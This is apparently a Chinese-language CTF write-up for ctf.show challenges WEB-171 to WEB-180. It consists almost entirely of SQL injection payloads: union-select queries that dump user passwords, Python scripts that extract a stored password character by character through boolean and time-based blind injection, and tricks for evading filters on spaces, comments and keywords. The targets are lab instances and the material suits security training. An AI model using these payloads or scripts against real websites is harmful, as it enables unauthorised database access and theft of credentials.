WEB-171
' union select * from user --+WEB-172
' union select 1,2,password from ctfshow_user2 --+WEB-173
' union select 1,2,password from ctfshow_user2 --+WEB-174
布尔盲注,脚本
import requests, re
dic = "abcdefghijklmnopqrstuvwxyz1234567890{-_}"
url = "http://ae92aede-0637-45ff-94a8-3a0e39c639c3.challenge.ctf.show/api/v4.php?id=1' and substring((select password from ctfshow_user4 where username='flag'),{},1)='{}' --+&page=1&limit=10"
res = ""
for a in range(1,50):
temp = res.__len__()
for i in dic:
url_temp = url.format(a, i)
print(url_temp)
r = requests.post(url=url_temp)
if re.findall("admin", r.text):
print(r.url,"\n",r.text)
res += i
break
if temp == res.__len__():
break
print(res)WEB-175
时间盲注,脚本
import requests, re, time
dic = "abcdefghijklmnopqrstuvwxyz1234567890{-_}"
url = "http://711e7c0b-bb87-4475-a14e-f2e4a58fe5c8.challenge.ctf.show/api/v5.php?id=1' and if(substring((select password from ctfshow_user5 where username='flag'),{},1)='{}',sleep(1),1) --+&page=1&limit=10"
res = ""
nowtime = time.time()
for a in range(1,50):
temp = res.__len__()
for i in dic:
nowtime = time.time()
url_temp = url.format(a, i)
print(url_temp)
r = requests.post(url=url_temp)
# if re.findall("admin", r.text):
# print(r.url,"\n",r.text)
# res += i
# break
if (nowtime+0.7) < time.time():
print(r.url,"\n",r.text)
res += i
break
if temp == res.__len__():
break
print(res)
WEB-176
大小写绕过
' Union Select * from ctfshow_user --+WEB-177
过滤了空格,注意”#“应该使用"%23"代替
1'/**/or/**/1=1/**/%23WEB-178
同样过滤空格,并且过滤了内敛注释,所以就用括号罢了。。。
'union(select(id),(username),(password)from(ctfshow_user))%23WEB-179
不知道比上一题多过滤了什么,但是同样可以用上一题的payload
'union(select(id),(username),(password)from(ctfshow_user))%23WEB-180
这题绕过了常见的注释符,--+,#,//等
但是我找到了一个特殊的,--%0c-或者--%0e-也可以绕过
'union(select(id),(username),(password)from(ctfshow_user))--%0e-这里不是非要使用括号绕过,%0c也是可以代替括号的
也可以这样子
-1'%0cor%0cusername%0clike%0c'flag